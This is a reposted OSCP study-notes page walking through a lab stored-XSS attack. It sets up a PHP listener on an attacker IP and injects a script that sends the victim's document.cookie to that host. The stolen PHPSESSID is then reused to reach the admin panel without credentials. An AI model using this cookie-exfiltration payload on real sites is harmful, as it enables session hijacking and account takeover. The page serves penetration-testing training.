码迷,mamicode.com
首页 > 移动开发 > 详细

OSCP Learning Notes - WebApp Exploitation(2)

时间:2019-07-18 23:57:37      阅读:132      评论:0      收藏:0      [点我收藏+]

标签:ini   tor   submit   nbsp   scp   mic   href   webapp   ssi   

Cross-Site Scripting(XSS)

 1. Using the tool - netdiscover to find the IP of target server.

netdiscover

技术图片

2.Browser the website http://10.0.0.21 through Firefox.

技术图片

3. Click ‘Test‘ . Then write the following script in the text box. 

<script>alter(‘XSS‘)</script>

 

技术图片

 

 技术图片

4.Create the index.php in the root folder.

<?php
$cookie = isset($_GET["test"])?$_GET[‘test‘]:"";
?>

技术图片

5. Start the php service.

service apache2 stop
php -S 10.0.0.109:80

技术图片

6. Write the following script in the text box, then click the "Submit Query" button.

<script>location.href=‘http://10.0.0.109/index.php?test=‘+document.cookie;</script>

技术图片

技术图片

 7. Install the Cookie Manager on the Firefox.

技术图片

 8. Edit the PHPSESSID value in the Cookies Manager tool and change the value to the PHPSESSID showed in Kali Linux terminal. Then save the cookie value.

技术图片

 

9. After change the cookie value - PHPSESSID. Click the ‘Admin‘ buttion, then you can login without username and password. You obtain the administrator privileges.

技术图片

 

 

技术图片

 

OSCP Learning Notes - WebApp Exploitation(2)

标签:ini   tor   submit   nbsp   scp   mic   href   webapp   ssi   

原文地址:https://www.cnblogs.com/keepmoving1113/p/11210706.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!